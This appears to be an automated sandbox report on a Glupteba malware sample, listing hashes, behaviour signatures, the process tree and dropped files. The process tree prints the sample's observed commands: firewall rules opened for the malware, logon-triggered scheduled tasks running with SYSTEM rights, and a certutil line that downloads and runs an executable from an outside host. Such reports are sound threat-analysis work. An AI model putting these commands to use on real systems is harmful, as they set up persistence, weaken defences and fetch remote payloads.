Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
21-05-2024 23:54
General
-
Target
6542432c1ffe194b593e4b4fb3eb473d_JaffaCakes118.exe
-
Size
3.9MB
-
MD5
6542432c1ffe194b593e4b4fb3eb473d
-
SHA1
8521d05073e2c56c90558c81220e7aa36938f300
-
SHA256
95ccc558fd037a17d0746a4f3715ef6c0cc26c9350e17fb5c50520f3d5b3ea1e
-
SHA512
bbca3d27af4bc81924ea51f01b1c3d7fe8f7a1b321da10e8026d0425dae7fecd956247302be6a610f651b6493c3baefc1ff073c2d30c51fde92b4619349b50ad
-
SSDEEP
98304:cl1QnaypI+helC2ibKAn9hmVlR+g6gpNkRur6Ugtd/jT7B:cwnaED9KT+g74ZtRB
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 20 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 2 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Modifies boot configuration data using bcdedit 1 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Windows directory 2 IoCs
-
Program crash 2 IoCs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 13 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\6542432c1ffe194b593e4b4fb3eb473d_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\6542432c1ffe194b593e4b4fb3eb473d_JaffaCakes118.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\6542432c1ffe194b593e4b4fb3eb473d_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\6542432c1ffe194b593e4b4fb3eb473d_JaffaCakes118.exe"2⤵
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\c6641b2686ea\c6641b2686ea.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\c6641b2686ea\c6641b2686ea.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
- Executes dropped EXE
- Manipulates WinMonFS driver.
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 8683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 8002⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5016 -ip 50161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 5368 -ip 53681⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
C:\Windows\rss\csrss.exeFilesize
3.9MB
MD56542432c1ffe194b593e4b4fb3eb473d
SHA18521d05073e2c56c90558c81220e7aa36938f300
SHA25695ccc558fd037a17d0746a4f3715ef6c0cc26c9350e17fb5c50520f3d5b3ea1e
SHA512bbca3d27af4bc81924ea51f01b1c3d7fe8f7a1b321da10e8026d0425dae7fecd956247302be6a610f651b6493c3baefc1ff073c2d30c51fde92b4619349b50ad
-
memory/5016-1-0x0000000006D80000-0x0000000007131000-memory.dmpFilesize
3.7MB
-
memory/5016-2-0x0000000007140000-0x000000000783C000-memory.dmpFilesize
7.0MB
-
memory/5016-3-0x0000000000400000-0x0000000000B16000-memory.dmpFilesize
7.1MB
-
memory/5016-6-0x0000000000400000-0x0000000000B16000-memory.dmpFilesize
7.1MB
-
memory/5016-5-0x0000000007140000-0x000000000783C000-memory.dmpFilesize
7.0MB
-
memory/5016-4-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5368-12-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5732-18-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5732-24-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5732-19-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5732-20-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5732-21-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5732-22-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5732-23-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5732-17-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5732-25-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5732-26-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5732-27-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5732-28-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5732-29-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB
-
memory/5732-30-0x0000000000400000-0x0000000005157000-memory.dmpFilesize
77.3MB